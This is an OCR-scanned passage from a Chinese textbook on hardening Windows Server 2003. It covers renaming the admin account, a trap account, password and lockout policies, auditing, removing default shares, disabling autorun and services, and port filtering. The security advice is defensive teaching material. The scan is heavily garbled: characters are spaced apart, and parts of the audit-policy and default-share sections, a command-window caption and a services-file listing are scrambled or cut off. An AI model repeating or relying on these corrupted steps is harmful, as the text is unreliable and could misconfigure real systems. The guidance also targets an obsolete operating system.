步骤 1: 选择 “开始 ”一 “程序 ”>“ 管 理工 具 ” 一 “本 地 安全 策略 "命令 ,打开 “本 地 安全 设 
置 "窗口 ,如 图 2-1 所 示 。 

步骤 2: 在 左 侧 窗 格 中 ,选择 “安全 设置 "一 “本 地 策略 ”>“ 安 全 选项 ”选项 ,在 右 侧 窗 格 
中 ,双击 “账户 : 重 命 名 系统 管理 员 账 户 " 策 略 选 项 ,打开 如 图 2-2 所 示 的 对 话 框 ,将 系统 管理 
员 账 户 名 称 Administrator 改 为 一 个 普通 的 账户 名 称 , 如 huang, 而 不 要 使 用 如 Admin 之 类 
的 账户 名 称 , 单 击 “ 确 定 ” 按 钮 。 

步骤 3: 更 改 完 成 后 ,选择 “开始 ”一 “程序 ”一 “管理 工具 ”一 “计算 机 管理 ”命令 ,打开 
“计算 机 管理 ”窗口 .在 左 侧 窗 格 中 ,选择 “系统 工具 ”一 “本 地 用 户 和 组 ”>“ 用 户 ” 选 项 ,如 
图 2-3 所 示 ,默认 的 Administrator 账户 名 称 已 被 更 改 为 huang。 
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图 2-1 “本 地 安全 设置 "窗口 图 2-2 重 命名 系统 管理 员 账 户 


步骤 4: 在 图 2-3 中 ,选择 左 侧 窗 格 中 的 “组 "选项 ,然后 双击 右 侧 窗 格 中 的 
Administrators 组 名 ,打开 “Administrators 属性 ”对 话 框 ,默认 只 有 Administrator 账户 ,如 
图 2-4 所 示 。 选 中 Administrator 账户 , 单 击 “ 删 除 ” 按 钮 ,将 该 账户 删除 。 


图 2-3 ”账户 更 改 结果 图 2-4 “Administrators 属性 ”对 话 框 


步骤 5: 在 图 2-4 中 , 单 击 “ 添 加 ”按钮 ,打开 “选择 用 户 ” 对 话 框 , 单 击 “ 高 级 ”按钮 ,再 单 
击 “ 立 即 查找 ”按钮 ,双击 对 话 框 底部 的 huang 选项 ,如 图 2-5 所 示 。 此 时 ,在 “输入 对 象 名 称 
来 选择 ”文本 框 中 自动 出 现 了 已 经 重 命名 的 管理 员 账 户 名 称 , 如 TEST\huang( 计 算 机 名 \ 账 
户 名 ) ,如 图 2-6 所 示 。 
步骤 6: 单 击 * 确 定 ” 按 钮 返回 “Administrators 属性 "对话 框 ,再 单 击 “ 确 定 ” 按 钮 完成 系 
统管 理 员 名 称 的 更 改 。 
(2) 创建 一 个 陷阱 账户 
陷阱 账户 就 是 让 非法 入 侵 者 误 认 为 是 管理 员 账 户 的 非 管 理 员 账 户 。 上 默认 的 管理 员 账 户 
Administrator 重 命名 后 ,可 以 创建 一 个 同名 的 拥有 最 低 权限 的 Administrator 账户 ,并 把 它 
添加 到 Guests 组 (Guests 组 的 权限 为 最 低 ) 中 ,再 为 该 账户 设置 一 个 超过 20 位 的 超级 复杂 
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密码 (其 中 包括 字母 数字、 特殊 符号 等 字符 )。 这 样 可 以 使 非法 入 侵 者 需要 花费 很 长 的 时 间 
才能 破解 密码 , 借 此 发 现 他 们 的 入 侵 企图 。 


图 2-5 “选择 用 户 ” 对 话 框 (1) 图 2-6 “选择 用 户 ” 对 话 框 (2) 


步骤 1: 选择 “开始 "一 “程序 "一 “管理 工具 ”一 “计算 机 管理 ”命令 ,打开 “计算机 管理 ” 
窗口 ,在 左 侧 窗 格 中 ,选择 “系统 工具 ”一 “本 地 用 户 和 组 >“ 用户” 选项 ,然后 右 击 用户 ” 选 
项 ,在 弹出 的 快捷 菜单 中 选择 “新 用 户 " 命 令 , 打 开 “ 新 用 户 ” 对 话 框 ,如 图 2-7 所 示 。 


TE 


图 2-7 “新 用 户 ” 对 话 框 


步骤 2: 在 “用 户 名 ”文本 框 中 输入 用 户 名 Administrator, 在 “密码 ”和 “确认 密码 ”文件 
框 中 输入 一 个 较 复 杂 的 密码 , 单 击 “ 创 建 "按钮 ,再 单 击 “ 关 闭 ” 按 钮 。 

步骤 3: 右 击 新 创建 的 用 户 名 Administrator, 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 , 打 
开 “Administrator 属性 ”对 话 框 ,选择 “隶属 于 ”选项 卡 .如 图 2-8 所 示 , 从 图 中 可 见 ， 
Administrator 用 户 默 认 隶 属于 Users 组 。 

步骤 4: 单 击 “ 添 加 ”按钮 ,打开 “选择 组 ”对 话 框 ,如 图 2-9 所 示 。 

步骤 5: 单 击 “ 高 级 "按钮 .再 单 击 “ 立 即 查找 ”按钮 ,双击 对 话 框 底部 的 Guests 组 名 ,如 
图 2-10 所 示 。 
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图 2-8 “Administrator 属性 ”对 话 框 (1) 图 2-9 “选择 组 ”对 话 框 (1) 


步骤 6: 单 击 “ 确 定 ” 按 钮 ,返回 “Administrator 属性 ”对 话 框 ,此 时 已 添加 了 Guests 组 ， 
如 图 2-11 所 示 。 


图 2-10 “选择 组 "对话 框 (2) 图 2-11 “Administrator 属性 ”对 话 框 (2) 


步骤 7: 在 图 2-11 中 ,选中 Users 组 名 , 单 击 “ 删 除 ” 按 钮 ,再 单 击 “ 确 定 ” 按 钮 。 此 时 ， 
Administrator 账户 已 设置 为 陷阱 账户 。 

(3) 不 让 系统 显示 上 次 登录 的 账户 名 

默认 情况 下 ,登录 对 话 框 中 会 显示 上 次 登录 的 账户 名 。 这 使 得 非法 入 侵 者 可 以 很 容易 
地 得 到 系统 的 一 些 账户 名 ,进而 做 密码 猜测 ,从 而 给 系统 带 来 一 定 的 安全 隐患 。 可 以 设置 登 
录 时 不 显示 上 次 登录 的 账户 名 ,来 解决 这 一 问题 。 

步骤 1: 在 “本 地 安全 设置 "窗口 的 左 侧 窗 格 中 ,选择 “本 地 策略 ”>“ 安 全 选项 ”选项 。 

步骤 2: 在 右 侧 窗 格 中 ,找到 并 双击 “交互 式 登录 :不 显示 上 次 的 用 户 名 ”选项 (如 
2-12 所 示 ) ,打开 “交互 式 登录 :不 显示 上 次 的 用 户 名 属性 ”对 话 框 ,在 “本 地 安全 设置 " 选 
项 卡 中 ,选中 “已 启用 ” 单 选 按钮 ,如 图 2-13 所 示 . 单 击 “确定 ”按钮 。 
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图 2-12 “本 地 安全 设置 "窗口 图 2-13 “交互 式 登录 :不 显示 上 次 的 
用 户 名 属性 ”对 话 框 


2.4.2 任务 2: 密 码 安全 配置 


1. 任务 目标 


(1) 了 解 操作 系统 密码 安全 的 重要 性 。 
(2) 掌握 密码 安全 配置 的 方法 。 


2. 任务 内 容 


(1) 设置 用 户 账户 策略 。 
(2) 设置 用 户 账户 锁定 策略 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows Server 2003 操作 系统 的 PC 1 台 , 或 Windows Server 2003 虚拟 机 1 台 。 
4. 任务 实施 步骤 


设置 一 个 安全 的 密码 ,对 系统 来 说 非常 重要 ,这 也 是 用 户 经 常 忽略 的 。 

(1) 设置 用 户 账户 策略 

步骤 1: 选择 “开始 ”一 “程序 ”一 “管理 工具 ”~ 本 地 安全 策略 ”命令 ,打开 * 本 地 安全 设 
置 "窗口 ,在 左 侧 窗 格 中 ,选择 “安全 设置 ?一 “账户 策略 ”密码 策略 ”选项 如 图 2-14 所 示 。 

步骤 2: 双击 右 侧 窗 格 中 的 “密码 长 度 最 小 值 策 略 选项 .打开 * 密 码 长 度 最 小 值 属性 ” 
对 话 框 ,选择 “本 地 安全 设置 ”选项 卡 , 设 置 密码 必须 至 少 是 6 个 字符 ,如 图 2-15 所 示 , 单 击 
“确定 ”按钮 ,返回 “本 地 安全 设置 "窗口 。 

步骤 3: 在 图 2-14 中 ,双击 右 侧 窗 格 中 的 “密码 最 短 使 用 期 限 " 策 略 选 项 ,打开 “密码 最 
短 使 用 期 限 属性 ”对 话 框 ,设置 “在 以 下 天 数 后 可 以 更 改 密码 ”为 3 天 ,如 图 2-16 所 示 , 单 击 
“确定 ”按钮 ,返回 “本 地 安全 设置 "窗口 。 

步骤 4: 同 理 , 设 置 “ 密 码 最 长 使 用 期 限 ” 为 14 天 ,设置 “强制 密码 历史 ”为 10 个 记 住 的 
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密码 ,设置 “密码 必须 符合 复杂 性 要 求 " 为 “已 启用 "”。 上 述 设置 完成 后 的 密码 策略 
如 图 2-17 所 示 。 


图 2-16 “密码 最 短 使 用 期 限 属性 "对 话 框 图 2-17 “本 地 安全 设置 ”窗口 (2) 


(2) 设置 用 户 账户 锁定 策略 

用 户 账户 锁定 策略 可 以 防止 非法 入 侵 者 不 断 地 猜测 用 户 的 账户 密码 。 

步骤 1: 在 图 2-17 中 ,选择 左 侧 窗 格 中 的 “账户 锁定 策略 ”选项 ,在 右 侧 窗 格 中 显示 了 账 
户 锁定 策略 的 三 个 策略 项 ,如 图 2-18 所 示 。 

步骤 2: 双击 右 侧 窗 格 中 的 "账户 锁定 阔 值 策略 选项 ,打开 * 账 户 锁定 阔 值 属性 ”对 话 
框 ,选择 “本 地 安全 设置 "选项 卡 ,设置 “在 发 生 以 下 情况 之 后 ,锁定 账户 ”为 3 次 无 效 登 录 ， 
如 图 2-19 所 示 。 

步骤 3: 单 击 “ 确 定 ” 按 钮 ,弹出 “建议 的 数值 改动 ”对 话 框 ,设置 建议 的 “账户 锁定 时 间 ” 
为 “30 分 钟 ?"“ 复 位 账户 锁定 计数 器 ”为 “30 分 钟 之 后 ”, 如 图 2-20 所 示 , 单 击 “ 确 定 ” 按 钮 , 完 
成 账户 锁定 策略 设置 。 
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图 2-20 “建议 的 数值 改动 ”对话 框 


2.4.3 任务 3: 系 统 安全 配置 
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1. 任务 目标 


(1) 了 解 操作 系统 的 系统 安全 的 重要 性 。 
(2) 掌握 系统 安全 配置 的 方法 。 


2. 任务 内 容 


(1) 自动 更 新 Windows 补丁 程序 。 
(2) 开启 审核 策略 。 

(3) 关闭 默认 共享 资源 。 

(4) 关闭 自动 播放 功能 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows Server 2003 操作 系统 的 PC 1 台 ,或 Windows Server 2003 虚拟 机 1 台 。 
4. 任务 实施 步骤 


(1) 自动 更 新 Windows 补丁 程序 
几乎 所 有 的 操作 系统 都 不 是 十 全 十 美的 :总 是 存在 各 种 安全 漏洞 ,这 使 非法 入侵 者 有 机 
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可 乘 。 因 此 ,及 时 给 Windows 系统 打上 补丁 程序 .是 
加 强 Windows 系统 安全 的 简单 .高 效 的 方法 。 

步骤 1: 右 击 桌面 上 的 “我 的 电脑 图标: 在 弹出 的 
快捷 菜单 中 选择 “属性 "命令 .打开 “系统 属性 ”对 话 框 。 

步骤 2: 在 “自动 更 新 "选项 卡 中 ,选中 “自动 ( 推 
荐 )” 单 选 按 钮 ,如 图 2-21 所 示 , 系 统 默认 在 每 天 凌晨 
3 时 自动 下 载 推荐 的 更 新 ,并 安装 它们 。 

(2) 开启 审核 策略 

安全 审核 是 Windows Server 2003 最 基本 的 入 侵 
检测 方法 。 当 有 非法 入侵 者 对 系统 进行 某 种 方式 人 侵 
时 ,都 会 被 安全 审核 记录 下 来 。 

步骤 1: 在 “本 地 安全 设置 "窗口 中 ,选择 “本 地 策 图 2-21 “系统 属性 ”对 话 框 
咯 ”>“ 审 核 策 略 ” 选 项 , 右 侧 窗 格 中 列 出 了 审核 策略 列 
表 , 这 些 审核 策略 在 默认 情况 下 都 是 未 开启 的 ,如 图 2-22 所 示 。 

步骤 2: 双击 右 侧 窗 格 中 的 “审核 登录 事件 "策略 选项 ,打开 “审核 登录 事件 属性 ”对 话 
框 ,在 “本 地 安全 设置 "选项 卡 中 ,选中 “成 功 ” 和 “失败 ”* 复 选 框 ,如 图 2-23 所 示 , 单 击 “ 确 定 ” 
按钮 。 


| 


日 
| 
| 
由 
由 
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图 2-22 “本 地 安全 设置 "窗口 图 2-23 “审核 登录 事件 属性 ”对 话 框 


步骤 3: 同 理 , 根 据 需 要 设置 其 他 审核 策略 。 
说 明 : 以 下 是 各 种 审核 策略 的 含义 。 
四 审核 策略 更 改 :审核 对 策略 的 改变 操作 。 
四 审核 登录 事件 :审核 账户 的 登录 或 注销 操作 。 
图 审核 对 象 访问 :审核 对 文件 或 文件 夹 等 对 象 的 操作 。 
图 审核 过 程 跟踪 :审核 应 用 程序 的 启动 和 关闭 。 
@ 审核 目录 服务 访问 :审核 对 活动 目录 的 各 种 访问 。 
审核 特权 使 用 :审核 用 户 执行 用 户 权限 的 操作 ,如 更 改 系统 时 间 等 。 
@ 审核 系统 事件 :审核 与 系统 相关 的 事件 ,如 重新 启动 或 关闭 计算 机 等 。 
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录 事 件 :审核 账户 的 登 寻 主 销 另 一 台 计 算 机 (用 于 验证 账户 ) 的 操作 。 
理 :审核 与 账户 管理 有 关 的 操作 


ee 管理 ,系统 会 创建 一 些 隐 项 的 特殊 共享 资源 ,如 
享 资 源 在 * 我 的 电脑 ”中 是 不 可 见 的 。 一 般 情 况 下 ,用户 不 
日 是 非法 入 侵 者 却 会 利用 它 来 对 系统 进行 攻击 ,以 获取 系统 
入 侵 因此 ， 统管 理 员 在 确认 不 会 使 用 这 些 特殊 共享 资源 


会 去 使 用 这 二 下 
的 控制 权 , 最 典型 的 就 是 IPC 
的 情况 下 ,应 删除 这 些 特殊 前 原 

步骤 1: 在 提示 符 ” 窗 口 中 ， 输入 net share 命令 ， 


图 2-24 使 用 net share 命令 查看 特殊 共享 资源 


步骤 2: 输入 net share ADMIN $ /delete 命令 ,删除 ADMIN $ 共享 资源 ,再 输入 net 
share 命令 ,验证 是 否 已 删除 ADMI 享 资源 ,如 图 2-2: 


同 理 , 可 删除 C$ 、.D$ 等 共享 资源 


所 示 


Ci NTTIDOYSVsystes32Veed_ exe 


图 2-25 ”删除 特殊 共享 资源 
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步骤 3: IPC$ 共享 资源 不 能 被 net share 命令 删除 . 需 利 用 注册 表 编 辑 器 来 对 它 进行 
限制 使 用 。 选 择 * 开 始 ” 一 运行 ”命令 .打开 * 和 运行 "对话 框 , 在 对 话 框 的 “打开 ”文本 框 中 
输入 regedit 命令 ,然后 单 击 “ 确 定 ” 按 钮 ,打开 注册 表 编 辑 器 ,找到 组 键 HKEY_LOCAL_ 
MACHINE\SYSTEM\ CurrentControlSet\Control\Lsa 中 的 restrictanonymous 子 键 ,将 其 
值 改 为 1。 如 果 没 有 这 个 子 键 , 则 新 建 它 , 如 图 2-26 所 示 。 此 时 一 个 匿名 用 户 仍 然 可 以 
空 连接 到 IPC$ 共享 ,但 无 法 通过 这 种 空 连接 列举 SAM 账号 和 共享 信息 的 权限 ( 枚 举 
攻击 ) 。 
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cou None Arbiter 
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图 2-26 使 用 注册 表 编 辑 器 禁用 IPC$ 


说 明 :D C$ 、.D$ 等 ;允许 管理 人 员 连 接 到 驱动 器 根 目录 下 的 共享 资源 。 

@ ADMIN $ :计算 机 远程 管理 期 间 使 用 的 资源 。 该 资源 的 路 径 总 是 系统 根 目 录 路 径 
(安装 操作 系统 的 目录 ,如 C:\Windows)。 

@ IPC$ :共享 命名 管理 的 资源 ,在 程序 之 间 的 通信 过 程 中 ,该 命名 管道 起 着 至 关 重 要 
的 作用 。 在 计算 机 的 远程 管理 期 间 , 以 及 在 查看 计算 机 的 共享 资源 时 使 用 IPCJ$$ 。 不 能 删 
除 该 资源 。 

图 系统 重新 启动 后 ,被 删除 的 特殊 共享 资源 将 会 重新 建立 。 因 此 ,为 保证 不 会 出 现 特 
殊 共 享 资源 攻击 ,应 使 用 批 处 理 的 方式 在 系统 重启 时 自动 进行 删除 操作 。 

@ 全 部 删除 系统 中 的 特殊 共享 资源 ,将 影响 系统 提供 的 文件 共享 服务 、 打 印 共 享 服务 
等 网 络 服务 ,删除 前 应 仔细 确认 Windows Server 2003 操作 系统 所 扮演 的 角色 ,是 作为 单独 
的 桌面 操作 系统 使 用 ,还 是 作为 网 络 操作 系统 提供 各 种 网 络 服务 使 用 。 

(4) 关闭 自动 播放 功能 

现在 很 多 病毒 (如 U 盘 病 毒 ) 会 利用 系统 的 自动 播放 功能 来 进行 传播 :关闭 系统 的 自动 
播放 功能 可 以 降低 病毒 传播 的 风险 。 
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步骤 1: 选择 “开始 ”一 “运行 "命令 ,打开 “运行 ”对话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输 
和 gpedit. msc 命令 ,然后 单 击 “ 确 定 ”按钮 ,打开 “组 策略 编辑 器 "窗口 。 

步骤 2: 在 窗口 的 左 侧 窗 格 中 ,选择 “本 地 计算 机 ?策略 ?一 “计算 机 配置 ?一 “管理 模 
板 ” 一 "系统 "选项 ,然后 在 右 侧 窗 格 中 找到 并 双击 “关闭 自动 播放 ?选项 (如 图 2-27 所 示 ), 打 
开 * 关 闭 自动 播放 属性 ”对 话 框 。 
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图 2-27 “组 策略 编辑 器 "窗口 图 2-28 “关闭 自动 播放 属性 ”对话 框 


步骤 3: 在 “设置 "选项 卡 中 ,选中 “已 启用 ” 单 选 按钮 ,并 在 “关闭 自动 播放 ”列表 中 选择 
需要 的 选项 ,如 “所 有 驱动器”, 如 图 2-28 所 示 , 单 击 “ 确 定 ” 按 钮 。 

注意 :“ 关 闭 自动 播放 ”设置 是 只 能 使 系统 不 再 列 出 光盘 和 移动 存储 设备 的 目录 ,并 
不 能 够 阻止 自动 播放 音乐 CD 盘 。 要 阻止 音乐 CD 的 自动 播放 ,可 更 改 移动 存储 设备 的 
属性 。 


2.4.4 任务 4: 服 务 安 全 配置 


1. 任务 目标 


(1) 了 解 操作 系统 服务 安全 的 重要 性 。 
(2) 掌握 服务 安全 配置 的 方法 。 


2. 任务 内 容 


(1) 关闭 不 必要 的 服务 。 
(2) 关闭 不 必要 的 端口 。 


3. 完成 任务 所 需 的 设备 和 软件 


装 有 Windows Server 2003 操作 系统 的 PC 1 台 ,或 Windows Server 2003 虚拟 机 1 人 台 。 
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4. 任务 实施 步骤 


(1) 关闭 不 必要 的 服务 

在 Windows 操作 系统 中 .默认 开启 的 服务 有 很 多 ,但 并 非 所 有 开启 的 服务 都 是 操作 系 
统 所 必需 的 ,禁止 所 有 不 必要 的 服务 可 以 节省 内 存 和 大 量 的 系统 资源 ,提升 系统 启动 和 运行 
的 速度 ,更 重要 的 是 ,可 以 减少 系统 受 攻击 的 风险 。 

下 面 以 关闭 “任务 计划 ”服务 为 例 说 明 如 何 关闭 服务 。“ 任 务 计划 ”的 服务 名 称 为 Task 
Scheduler, 如 果 运 行 了 Task Scheduler 服务 ,那么 一 些 黑客 可 以 先 通过 特殊 方法 将 病毒 程序 或 
木马 程序 传输 到 本 地 工作 站 硬盘 中 ,之 后 借助 Windows 系统 内 置 的 net time 命令 查询 一 下 本 
地 工作 站 的 当前 系统 时 间 , 然 后 再 通过 at 命令 创建 一 个 在 合适 时 间 运 行 病毒 程序 的 任务 计 
划 , 到 了 指定 时 间 后 本 地 工作 站 就 会 受到 事先 植 人 硬盘 的 病毒 程序 或 木马 程序 的 * 蹊 蹦 " 了 。 
要 是 将 Task Scheduler 服务 关闭 ,那么 黑客 就 无 法 通过 at 命令 创建 病毒 攻击 计划 了 。 

步骤 1: 查看 服务 。 选 择 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 “服务 ”命令 ,打开 “服务 ” 窗 
口 ,如 图 2-29 所 示 ,可 见 有 很 多 服务 已 启动 。 

步骤 2: 关闭 服务 。 在 图 2-29 中 找到 并 双击 Task Scheduler 服务 选项 ,打开 “Task 
Scheduler 的 属性 ”对 话 框 ,如 图 2-30 所 示 。 单 击 * 停 止 ?按钮 , 停 用 Task Scheduler 服务 ,再 
在 “启动 类 型 "下 拉 列 表 框 中 选择 “禁用 ”选项 ,这 样 下 次 系统 重新 启动 时 就 不 会 重新 启用 
Task Scheduler 服务 , 单 击 “ 确 定 ” 按 钮 。 
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图 2-29 “服务 "窗口 
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图 2-30 “Task Scheduler 的 属性 ”对 话 框 


(2) 关闭 不 必要 的 端口 

每 一 项 服务 都 对 应 相应 的 端口 ,比如 众所周知 WWW 服务 的 端口 为 80,SMTP 服务 的 
端口 为 25 ,FTP 服务 的 端口 为 21,Telnet 服务 的 端口 为 23 等 。 对 于 一 些 不 必要 的 端口 ,应 
将 它们 关闭 。 在 Windows 系统 目录 中 的 system32\drivers\etc\services 文件 中 有 公认 端口 
和 服务 的 对 照 表 ,如 图 2-31 所 示 。 


| 王 记事 本 t=/E| 
文件 EE) 编辑 下) 格式 @) 查看 QW 帮助 0 
Copyright (c) 1993-2984 Microsoft Corp- 


This file contains port nunbers for well-known services defined by IRI 
Format: 


<service nane> <port nunber>/<protocol》 [aliases...]  [#<comnent>] 


7/tcp 

7/udp 

9/tcp sink null 

9/udp sink null 

11/tcp users HActive users 

11/udp Users #Active users 

13/tcp 

13/udp 

17/tcp quote HQuote of the day 

17/udp quote HQuote of the day 

19/tcp ttytst source HCharacter generatol 

19/udp ttytst source HCharacter generatol 

28/tcp HFTP ,data 

21/tcp HFTP -control 

22/tcp HSSH Remote Login PI 

23/tcp 

25/tcp nail HSinple Mail Transf' 

37/tcp ~ tinserver 

37/udp timserver 

39/udp resource HResource Location | 

42/tcp nane HHost Nane Server 

42/udp nane HHost Nane Server 

3/tcp whois 

53/tcp HDonmain Name Seruer 

53/udp HDonain Nane Server 

67/udp dhcps HBootstrap Protocol 

68/udp dhcpc HBootstrap Protocol 
加 | 


2-31 ”端口 与 服务 对 照 表 
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@ 用 netstat 命令 查看 本 机 开放 的 端口 。 系 统 内 部 命令 netstat 可 显示 有 关 统 计 信 息 
和 当前 TCP/IP 网 络 连接 的 情况 . 它 可 以 用 来 获得 系统 网 络 连接 的 信息 (使 用 的 端口 和 在 使 
用 的 协议 等 )、 收 到 和 发 出 的 数据 、 被 连接 的 远程 系统 的 端口 等 。 其 语法 格式 为 


netstat [ -a][ ~e][—-n][-s][ -pprotocol][ —r][interval] 


在 “命令 行 提 示 符 ”窗口 中 ,输入 netstat -an 命令 ,查看 系统 端口 状态 , 列 出 系统 正在 开放 
的 端口 号 及 其 状态 ,如 图 2-32 所 示 ,可 见 系 统 开 放 的 端口 号 有 135、445、137、138、139 等 。 


图 2-32 netstat -an 命令 的 使 用 


) 关闭 139 端口 。139 端口 是 NetBIOS 协议 所 使 用 的 端口 ,在 安装 了 TCP/IP 协议 的 

同时 ,NetBIOS 也 会 被 作为 默认 设置 安装 到 系统 中 。139 端口 的 开放 意味 着 硬盘 可 能 会 在 
网 络 中 共享 ;网 上 黑客 也 可 通过 NetBIOS 知道 用 户 计算 机 中 的 一 切 。 在 以 前 的 Windows 
版 本 中 ,只 要 不 安装 Microsoft 网 络 的 文件 和 打印 共享 协议 ,就 可 关闭 139 端口 。 但 在 
Windows Server 2003 中 ,只 这 样 做 是 不 行 的 。 如 果 想 彻底 关闭 139 端口 ,具体 步骤 如 下 。 

步骤 1: 右 击 桌面 上 的 “网 上 邻居 "图标, 在 弹出 的 快捷 菜单 中 选择 “属性 "命令 ,打开 “网 
络 连接 ”窗口 。 再 右 击 “本 地 连接 "图标, 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “本 地 连 
接 属性 ”对 话 框 ,如 图 2-33 所 示 

步骤 2: 取消 选择 “Microsoft 网 络 的 文件 和 打印 共享 “各 迁 杠 ( 轩 去 接 Miezosoft 网 络 
的 文件 和 打印 共享 "前 面 的 “VV”) ,再 选中 “Internet 协议 (TCP/IP)” 选 项 , 单 击 “ 属 性 ”按钮 ， 
打开 “Internet 协议 (TCP/IP) 属性 ”对 话 框 ,如 图 2-34 所 示 。 

步骤 3: 单 击 “ 高 级 "按钮 ,打开 “高 级 TCP/IP 设置 ”对话 框 ,在 WINS 选项 卡 中 ,选中 

“禁用 TCP/IP 上 的 NetBIOS” 单 选 按 钮 ,如 图 2-35 所 示 。 

步骤 4: 单 击 “ 确 定 ” 按 钮 ,返回 “Internet 协议 (TCP/IP) 属性 ”对 话 框 ,再 单 击 “ 确 定 ” 按 
钮 ,返回 “本 地 连接 属性 ”对 话 框 , 单 击 “ 关 闭 ” 按 钮 

加 端口 过 滤 。 假 如 计算 机 中 安装 了 Internet 信息 服务 (IIS) ,如果 只 打算 浏览 网 页 ,可 
设置 端口 过 滤 ,只 允许 TCP 协议 的 80 端口 通过 ,而 TCP 协议 的 其 他 端口 不 允许 通过 。 设 
置 步骤 如 下 。 

步骤 1: 在 图 2-35 如 图 2-36 所 示 。 

步骤 2: 双击 图 中 的 “TCP/IP 筛选 选项 .打开 *TCP/IP 筛选 ”对 话 框 。 


' 
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图 2-33 “本 地 连接 属性 ”对 话 框 图 2-34 “Internet 协议 (TCP/IP) 属性 ”对 话 框 


步骤 3: 选中 “启用 TCP/IP 筛选 (所 有 适配器 )” 复 
选 框 ,选中 “TCP 端口 " 栏 中 的 “只 允许 " 单 选 按钮 , 单 击 
“添加 ”按钮 ,打开 * 添 加 筛选 器 "对 话 框 , 在 “TCP 端口 ” 
文本 框 中 输入 端口 号 80, 如 图 2-37 所 示 。 

步骤 4: 单 击 * 确 定 "按钮 ,返回 “TCP/IP 筛选 "对 话 
框 ,再 单 击 “ 确 定 ” 按 钮 ,返回 “高 级 TCP/IP 设置 "对 话 框 。 

@ 关闭 其 他 端口 。 在 默认 情况 下 .Windows 操作 
系统 的 很 多 端口 是 开放 的 。 用 户 在 上 网 的 时 候 ,病毒 
和 黑客 可 通过 这 些 端口 连 上 用 户 的 计算 机 ,所 以 应 该 
关闭 这 些 端口 。 比 如 TCP 135、139、445、593、1025 端 
口 和 UDP 135、137、138、445 端口 ,一 些 流行 病毒 的 后 
门 端口 ,如 TCP 2745、3127、6129 端口 .以 及 远程 服务 图 >-35 “高 级 TCP/IP 设置 "对 话 框 (1) 
访问 端口 3389 等 ,都 需要 被 关闭 才 可 解除 隐患 。 下 面 
以 关闭 TCP 135 端口 为 例 ,介绍 关闭 端口 的 方法 。 


E73 EE 


图 2-36 “高 级 TCP/IP 设置 ”对话 框 (2) 图 2-37 “添加 筛选 器 ?对话 框 
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步骤 1: 选择 “开始 ”~“ 程 序 ”>“ 管 理工 具 ” 一 “本 地 安全 策略 "命令 ,打开 “本 地 安全 设 
置 " 窗 口 ,在 左 侧 窗 格 中 ,选择 “IP 安全 策略 ,在 本 地 计算 机 ”选项 ,在 右 侧 窗 格 的 空白 位 置 右 
击 ,在 弹出 的 快捷 菜单 中 选择 “创建 IP 安全 策略 "命令 ,如 图 2-38 所 示 。 


图 2-38 “本 地 安全 设置 "窗口 (1) 


步骤 2: 在 打开 的 向 导 中 单 击 * 下 一 步 "按钮 ,打开 *IP 安全 策略 名 称 ” 对 话 框 ,在 “名 称 ” 
文本 框 输 入 “我 的 安全 策略 ”, 如 图 2-39 所 示 。 

步骤 3: 单 击 “ 下 一 步 " 按 钮 ,打开 “安全 通信 请 求 " 对 话 框 ,取消 选择 “激活 默认 响应 规 
则 ” 复 选 框 ， 2-40 所 示 。 


图 2-39 “IP 安全 策略 名 称 ” 对 话 框 图 2-40 “安全 通信 请 求 " 对 话 框 


步骤 4: 单 击 * 下 一 步 " 按 钮 ,再 单 击 * 完 成 ”按钮 ,打开 * 我 的 安全 策略 属性 ”对 话 框 ,如 
2-41 所 示 。 

步骤 5: 在 “规则 ?选项 卡 中 ,取消 选择 * 使 用 * 添 加 向 导 ”" 复 选 框 ,再 单 击 “ 添 加 ”按钮 , 打 
开 * 新 规则 属性 ”对 话 框 ,如 图 2-42 所 示 。 

步骤 6: 单 击 “ 添 加 ”按钮 .打开 “IP 筛选 器 列表 ”对话 框 ,在 名称” 文本 框 中 输入 “屏蔽 
135 端口 ”, 取 消 选 择 “ 使 用 添加 向 导 ” 复 选 框 ,如 图 2-43 所 示 。 

步骤 7: 单 击 “ 添 加 ”按钮 ,打开 “IP 筛选 器 属性 "对话 框 ,在 “地 址 ”选项 卡 中 ,在 “ 源 地 
址 ”下 拉 列 表 框 中 选择 “任何 IP 地 址 ”选项 ,在 “目标 地 址 ”下 拉 列 表 框 中 选择 “我 的 IP 地 址 ” 
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图 2-43 “IP 筛选 器 列表 "对话 框 图 2-44 “IP 筛选 器 属性 ”对 话 框 (1) 


选项 ,如 图 2-44 所 示 。 

步骤 8: 在 “协议 ”选项 卡 中 ,选择 协议 类 型 为 TCP, 选 中 “从 任意 端口 ?和 “到 此 端口 " 单 
选 按钮 ,并 在 其 下 的 文本 框 中 输入 端口 号 135, 如 图 2-45 所 示 。 

步骤 9: 单 击 “ 确 定 ”按钮 .返回 “IP 筛选 器 列表 ”对 话 框 ,再 单 击 “ 确 定 ” 按 钮 ,返回 “新 规 
则 属性 ”对 话 框 ,可 以 看 到 已 经 添加 了 一 条 “屏蔽 135 端口 ”筛选 器 ,如 图 2-46 所 示 , 它 可 以 
防止 外 界 通过 135 端口 连 上 用 户 的 计算 机 。 同 理 ,可 添加 其 他 IP 筛选 器 。 

步骤 10: 选择 “屏蔽 135 端口 ?筛选 器 ,然后 单 击 其 左边 的 圆圈 ,表示 已 经 激活 ,然后 选 
择 “ 筛 选 器 操作 ”选项 卡 ,如 图 2-47 所 示 。 

步骤 11: 在 “筛选 器 操作 ”选项 卡 中 ,取消 选择 “使 用 “添加 向 导 ，” 复 选 框 , 单 击 “ 添 加 ” 按 
钮 ,打开 * 新 筛选 器 操作 属性 ”对 话 框 ,如 图 2-48 所 示 。 

步骤 12: 选中 “阻止 " 单 选 按钮 .然后 单 击 “ 确 定 ” 按 钮 ,返回 “新 规则 属性 ”对 话 框 ,在 
“筛选 器 操作 ?选项 卡 中 .可 以 看 到 已 经 添加 了 一 个 新 的 筛选 器 操作 ,选择 * 新 筛选 器 操作 ? 选 
项 ,然后 单 击 其 左边 的 圆圈 ,表示 已 经 激活 ,如 图 2-49 所 示 。 

步骤 13: 单 击 “ 关 闭 ” 按 钮 ,返回 到 “我 的 安全 策略 属性 ?对 话 框 ,选中 * 屏 项 135 端口 ” 
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复 选 框 ,如 图 2-50 所 示 , 单 击 “ 确 定 ” 按 钮 关闭 对 话 框 。 


